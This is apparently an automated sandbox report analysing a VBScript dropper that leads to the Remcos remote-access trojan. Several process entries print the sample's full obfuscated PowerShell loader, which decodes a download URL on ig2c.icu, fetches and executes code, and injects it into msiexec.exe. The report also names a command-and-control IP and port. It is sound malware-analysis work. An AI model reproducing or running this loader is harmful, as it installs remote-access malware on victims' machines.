              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5078Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4801Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8074Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1597Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1004Thread sleep count: 1898 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1004Thread sleep time: -5694000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1004Thread sleep count: 8091 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1004Thread sleep time: -24273000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000003.1343994301.00000223ADA1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\F
              Source: msiexec.exe, 00000007.00000002.2649817843.0000000006C59000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2649817843.0000000006C95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.1547929041.0000024870EF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_045AD420 LdrInitializeThunk,5_2_045AD420

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7536.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$handsaws='underhive';;$hjlpevinduernes='genernrr';;$skovspurvenes='folkekre';;$fremsende='peddigrrets';;$kbelysten=$host.name; function astroite($moedt){if ($kbelysten) {$potheen='madelines214';$spildendes=4;$racketlike=$spildendes}do{$harpers+=$moedt[$racketlike];$racketlike+=5} until(!$moedt[$racketlike])$harpers}function forvanskende($piphas119){ .($criminologist) ($piphas119)}$redefinerende=astroite 'vascnver,e roet oto.uhyrw';$redefinerende+=astroite 'charemel,b si,canetl skiibrecefeltnk.ont';$adkomsthaveren=astroite 'chepmunwook lizrangilattlst nl cena pom/';$knippelgodes=astroite ' nkt es llei s vit1plat2';$grillhandske='corv[ stananlge inathjti.opkasforsef rsr,inevrudlico tcbareeslu p skyophotitendnrealtbr dm undaudvanfo fabombg br e gr rfol ]mu,f:upwe: il,sgoodeukolc emuf emrst mierratinteysup.pben.rpatio gentundroan ycklonodia lti.s= up$s rakm.ndn acti d.spkolopra ie prsl owegflasobyggd v.leindfs';$adkomsthaveren+=astroite 'un,a5hum .fis.0bill ,and(ov rwboobikernn mosdb rtoslotw booshand bypnre,gtpent re y1fork0fa n.ausp0over; f.n mussw efti carn.dea6neur4ophi; syl wi.dxbhin6pinm4cama;mo,b drosr f rvquad:sket1tot 3hous1indg. la 0urop) ger genngonycet.gtc prokune o ind/skal2josi0pins1 ord0fu o0 frm1ov r0p op1aeg. cyklf,fpaicombrteate undfstylodef x spa/ g s1orch3 mo,1 men.dato0';$racketlikenddateringsfase=astroite ' .utuunmusconse f er fo - raca s rgsta.emor,n vert';$aandsaristokratens=astroite 'doblhundetsa dtstrapantess mm:skru/opsl/ timi frugclep2rentcor,h.klapiatelc ancu tra/kludzdopitcomby grosbiorv.cturbystyl ngzseis/ revbmbleltrvluhemisgrimt appeoverrrinkerhinrdiff.dor dspadeskarpsodfl como enzy';$tryksager=astroite ' elm>';$criminologist=astroite 'hulli bonebat.x';$lnindkomsts='noncontingency';$breadbox='\misinforms.non';forvanskende (astroite ' skr$rm bgsv nlparaotappbma uau melbema:faktcshrii hosfllesbehaeopunlpuin= und$uns.esandnintovdien:jac aun epcullpkammdanglaelektps ua sub+fo n$ eskbsubsrbarnethora pladdepeb d mosni x');forvanskende (astroite ' an$sprog.krslsti okliebrefaab.ggl a.k:subcg rumrchowa rekmu demchiconeoofafveoparan mokemicrrs agspely=baz $f,beaoutwajab,nnaphdtrres eaga cykrobseicop,shkketentiopennk typrklynaedapt inge.jern dsmsoutw. va,ssubdpverdlunsiina st fry( ski$spects lvr ssiy.rank bars teka hangkemie rar cal)');forvanskende (astroite $grillhandske);$aandsaristokratens=$grammofoners[0];$couloir4=(astroite ',obb$surngpubll bikosupebbazeafantl lin: rindstibi,ornf a hfhalmecongrheade udrnudebtcohaiundeaunth= ,erncedae doywskil- dibob,dgbf rrjm ske eluc afht udr watsunmoydhfpstribtectoecaromhyst. ven$svarrs weeskyld ouseunexfopunidissn dvie b kr rane,arsnka tdu dee');forvanskende ($couloir4);forvanskende (astroite ' moo$ ylod bu,i.obbfaandfsonnetartr .ydeskafnl,svt syriunivafio . enhsexte.neoaschfdudgieejerrgemissemi[ti m$ agrr rkba forc klukkerme ,ntto,idl unsi.riuk i le s.hn vald
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$handsaws='underhive';;$hjlpevinduernes='genernrr';;$skovspurvenes='folkekre';;$fremsende='peddigrrets';;$kbelysten=$host.name; function astroite($moedt){if ($kbelysten) {$potheen='madelines214';$spildendes=4;$racketlike=$spildendes}do{$harpers+=$moedt[$racketlike];$racketlike+=5} until(!$moedt[$racketlike])$harpers}function forvanskende($piphas119){ .($criminologist) ($piphas119)}$redefinerende=astroite 'vascnver,e roet oto.uhyrw';$redefinerende+=astroite 'charemel,b si,canetl skiibrecefeltnk.ont';$adkomsthaveren=astroite 'chepmunwook lizrangilattlst nl cena pom/';$knippelgodes=astroite ' nkt es llei s vit1plat2';$grillhandske='corv[ stananlge inathjti.opkasforsef rsr,inevrudlico tcbareeslu p skyophotitendnrealtbr dm undaudvanfo fabombg br e gr rfol ]mu,f:upwe: il,sgoodeukolc emuf emrst mierratinteysup.pben.rpatio gentundroan ycklonodia lti.s= up$s rakm.ndn acti d.spkolopra ie prsl owegflasobyggd v.leindfs';$adkomsthaveren+=astroite 'un,a5hum .fis.0bill ,and(ov rwboobikernn mosdb rtoslotw booshand bypnre,gtpent re y1fork0fa n.ausp0over; f.n mussw efti carn.dea6neur4ophi; syl wi.dxbhin6pinm4cama;mo,b drosr f rvquad:sket1tot 3hous1indg. la 0urop) ger genngonycet.gtc prokune o ind/skal2josi0pins1 ord0fu o0 frm1ov r0p op1aeg. cyklf,fpaicombrteate undfstylodef x spa/ g s1orch3 mo,1 men.dato0';$racketlikenddateringsfase=astroite ' .utuunmusconse f er fo - raca s rgsta.emor,n vert';$aandsaristokratens=astroite 'doblhundetsa dtstrapantess mm:skru/opsl/ timi frugclep2rentcor,h.klapiatelc ancu tra/kludzdopitcomby grosbiorv.cturbystyl ngzseis/ revbmbleltrvluhemisgrimt appeoverrrinkerhinrdiff.dor dspadeskarpsodfl como enzy';$tryksager=astroite ' elm>';$criminologist=astroite 'hulli bonebat.x';$lnindkomsts='noncontingency';$breadbox='\misinforms.non';forvanskende (astroite ' skr$rm bgsv nlparaotappbma uau melbema:faktcshrii hosfllesbehaeopunlpuin= und$uns.esandnintovdien:jac aun epcullpkammdanglaelektps ua sub+fo n$ eskbsubsrbarnethora pladdepeb d mosni x');forvanskende (astroite ' an$sprog.krslsti okliebrefaab.ggl a.k:subcg rumrchowa rekmu demchiconeoofafveoparan mokemicrrs agspely=baz $f,beaoutwajab,nnaphdtrres eaga cykrobseicop,shkketentiopennk typrklynaedapt inge.jern dsmsoutw. va,ssubdpverdlunsiina st fry( ski$spects lvr ssiy.rank bars teka hangkemie rar cal)');forvanskende (astroite $grillhandske);$aandsaristokratens=$grammofoners[0];$couloir4=(astroite ',obb$surngpubll bikosupebbazeafantl lin: rindstibi,ornf a hfhalmecongrheade udrnudebtcohaiundeaunth= ,erncedae doywskil- dibob,dgbf rrjm ske eluc afht udr watsunmoydhfpstribtectoecaromhyst. ven$svarrs weeskyld ouseunexfopunidissn dvie b kr rane,arsnka tdu dee');forvanskende ($couloir4);forvanskende (astroite ' moo$ ylod bu,i.obbfaandfsonnetartr .ydeskafnl,svt syriunivafio . enhsexte.neoaschfdudgieejerrgemissemi[ti m$ agrr rkba forc klukkerme ,ntto,idl unsi.riuk i le s.hn vald
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$handsaws='underhive';;$hjlpevinduernes='genernrr';;$skovspurvenes='folkekre';;$fremsende='peddigrrets';;$kbelysten=$host.name; function astroite($moedt){if ($kbelysten) {$potheen='madelines214';$spildendes=4;$racketlike=$spildendes}do{$harpers+=$moedt[$racketlike];$racketlike+=5} until(!$moedt[$racketlike])$harpers}function forvanskende($piphas119){ .($criminologist) ($piphas119)}$redefinerende=astroite 'vascnver,e roet oto.uhyrw';$redefinerende+=astroite 'charemel,b si,canetl skiibrecefeltnk.ont';$adkomsthaveren=astroite 'chepmunwook lizrangilattlst nl cena pom/';$knippelgodes=astroite ' nkt es llei s vit1plat2';$grillhandske='corv[ stananlge inathjti.opkasforsef rsr,inevrudlico tcbareeslu p skyophotitendnrealtbr dm undaudvanfo fabombg br e gr rfol ]mu,f:upwe: il,sgoodeukolc emuf emrst mierratinteysup.pben.rpatio gentundroan ycklonodia lti.s= up$s rakm.ndn acti d.spkolopra ie prsl owegflasobyggd v.leindfs';$adkomsthaveren+=astroite 'un,a5hum .fis.0bill ,and(ov rwboobikernn mosdb rtoslotw booshand bypnre,gtpent re y1fork0fa n.ausp0over; f.n mussw efti carn.dea6neur4ophi; syl wi.dxbhin6pinm4cama;mo,b drosr f rvquad:sket1tot 3hous1indg. la 0urop) ger genngonycet.gtc prokune o ind/skal2josi0pins1 ord0fu o0 frm1ov r0p op1aeg. cyklf,fpaicombrteate undfstylodef x spa/ g s1orch3 mo,1 men.dato0';$racketlikenddateringsfase=astroite ' .utuunmusconse f er fo - raca s rgsta.emor,n vert';$aandsaristokratens=astroite 'doblhundetsa dtstrapantess mm:skru/opsl/ timi frugclep2rentcor,h.klapiatelc ancu tra/kludzdopitcomby grosbiorv.cturbystyl ngzseis/ revbmbleltrvluhemisgrimt appeoverrrinkerhinrdiff.dor dspadeskarpsodfl como enzy';$tryksager=astroite ' elm>';$criminologist=astroite 'hulli bonebat.x';$lnindkomsts='noncontingency';$breadbox='\misinforms.non';forvanskende (astroite ' skr$rm bgsv nlparaotappbma uau melbema:faktcshrii hosfllesbehaeopunlpuin= und$uns.esandnintovdien:jac aun epcullpkammdanglaelektps ua sub+fo n$ eskbsubsrbarnethora pladdepeb d mosni x');forvanskende (astroite ' an$sprog.krslsti okliebrefaab.ggl a.k:subcg rumrchowa rekmu demchiconeoofafveoparan mokemicrrs agspely=baz $f,beaoutwajab,nnaphdtrres eaga cykrobseicop,shkketentiopennk typrklynaedapt inge.jern dsmsoutw. va,ssubdpverdlunsiina st fry( ski$spects lvr ssiy.rank bars teka hangkemie rar cal)');forvanskende (astroite $grillhandske);$aandsaristokratens=$grammofoners[0];$couloir4=(astroite ',obb$surngpubll bikosupebbazeafantl lin: rindstibi,ornf a hfhalmecongrheade udrnudebtcohaiundeaunth= ,erncedae doywskil- dibob,dgbf rrjm ske eluc afht udr watsunmoydhfpstribtectoecaromhyst. ven$svarrs weeskyld ouseunexfopunidissn dvie b kr rane,arsnka tdu dee');forvanskende ($couloir4);forvanskende (astroite ' moo$ ylod bu,i.obbfaandfsonnetartr .ydeskafnl,svt syriunivafio . enhsexte.neoaschfdudgieejerrgemissemi[ti m$ agrr rkba forc klukkerme ,ntto,idl unsi.riuk i le s.hn valdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8088, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-7K8JADJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8088, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		321
              Scripting              		311
              Process Injection              		1
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture1
              Ingress Tool Transfer              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input Capture113
              Application Layer Protocol              		Data Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576526 Sample: Sublabially.vbs Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 23 ig2c.icu 2->23 29 Suricata IDS alerts for network traffic 2->29 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 10 other signatures 2->35 8 wscript.exe 1 2->8         started        11 powershell.exe 15 2->11         started        signatures3 process4 signatures5 37 VBScript performs obfuscated calls to suspicious functions 8->37 39 Suspicious powershell command line found 8->39 41 Wscript starts Powershell (via cmd or directly) 8->41 51 2 other signatures 8->51 13 powershell.exe 14 19 8->13         started        43 Early bird code injection technique detected 11->43 45 Writes to foreign memory regions 11->45 47 Found suspicious powershell code related to unpacking or dynamic code loading 11->47 49 Queues an APC in another process (thread injection) 11->49 17 msiexec.exe 3 6 11->17         started        19 conhost.exe 11->19         started        process6 dnsIp7 25 ig2c.icu 172.67.210.11, 443, 49717, 49815 CLOUDFLARENETUS United States 13->25 53 Found suspicious powershell code related to unpacking or dynamic code loading 13->53 21 conhost.exe 13->21         started        27 154.216.18.216, 2404, 49826, 49877 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 17->27 55 Detected Remcos RAT 17->55 signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Sublabially.vbs11%VirustotalBrowse
              Sublabially.vbs3%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://ig2c.icu0%Avira URL Cloudsafe
